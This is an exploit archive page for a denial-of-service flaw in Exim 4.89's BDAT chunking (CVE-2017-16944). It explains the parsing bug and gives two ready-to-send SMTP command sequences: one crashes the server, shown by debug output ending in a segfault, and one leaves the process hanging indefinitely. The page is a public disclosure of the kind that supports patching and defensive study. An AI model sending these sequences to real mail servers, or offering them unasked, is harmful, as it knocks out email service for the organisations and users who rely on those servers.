what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Exim 4.89 Denial Of Service

Exim 4.89 Denial Of Service
Posted Nov 27, 2017
Authored by meh

Exim version 4.89 suffers from a denial of service vulnerability while parsing the BDAT data header.

tags | exploit, denial of service
advisories | CVE-2017-16944
SHA-256 | 06400f3e55ff24c12a728e79c0653462e865d8c5b296a559adff089a0a57f067

Exim 4.89 Denial Of Service

Change Mirror Download
While parsing BDAT data header, exim still scans for '.' and consider it the end of mail.
https://github.com/Exim/exim/blob/master/src/src/receive.c#L1867

Exim goes into an incorrect state after this message is sent because the function pointer receive_getc is not reset. If the following command is also a BDAT, receive_getc and lwr_receive_getc become the same and an infinite loop occurs inside bdat_getc. Program crashes due to running out of stack.
https://github.com/Exim/exim/blob/master/src/src/smtp_in.c#L547

Here is a simple PoC which leads to an infinite loop and program crash:

EHLO localhost
MAIL FROM:<test@localhost>
RCPT TO:<test@localhost>
BDAT 10
.
BDAT 0


Part of debug info
============================
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30502 SMTP>> 250 0 byte chunk received
15:36:54 30502 chunking state 0
15:36:54 30295 child 30502 ended: status=0x8b
15:36:54 30295 signal exit, signal 11 (core dumped)
15:36:54 30295 1 SMTP accept process now running
15:36:54 30295 Listening...
============================

We also found that this vulnerability can make exim hang(go into an infinite loop without crashing and run forever) even the connection is closed. It seems like this can be used to raise a resource based DoS attack.
This can be triggered using the following command:

EHLO localhost
MAIL FROM:<test@localhost>
RCPT TO:<test@localhost>
BDAT 100
.
MAIL FROM:<test@localhost>
RCPT TO:<test@localhost>
BDAT 0 LAST

// Tested on current master, ubuntu16.04.

Login or Register to add favorites

File Archive:

September 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    23 Files
  • 2
    Sep 2nd
    12 Files
  • 3
    Sep 3rd
    0 Files
  • 4
    Sep 4th
    0 Files
  • 5
    Sep 5th
    10 Files
  • 6
    Sep 6th
    8 Files
  • 7
    Sep 7th
    30 Files
  • 8
    Sep 8th
    14 Files
  • 9
    Sep 9th
    26 Files
  • 10
    Sep 10th
    0 Files
  • 11
    Sep 11th
    0 Files
  • 12
    Sep 12th
    5 Files
  • 13
    Sep 13th
    28 Files
  • 14
    Sep 14th
    15 Files
  • 15
    Sep 15th
    17 Files
  • 16
    Sep 16th
    9 Files
  • 17
    Sep 17th
    0 Files
  • 18
    Sep 18th
    0 Files
  • 19
    Sep 19th
    12 Files
  • 20
    Sep 20th
    15 Files
  • 21
    Sep 21st
    20 Files
  • 22
    Sep 22nd
    13 Files
  • 23
    Sep 23rd
    12 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    30 Files
  • 27
    Sep 27th
    27 Files
  • 28
    Sep 28th
    8 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close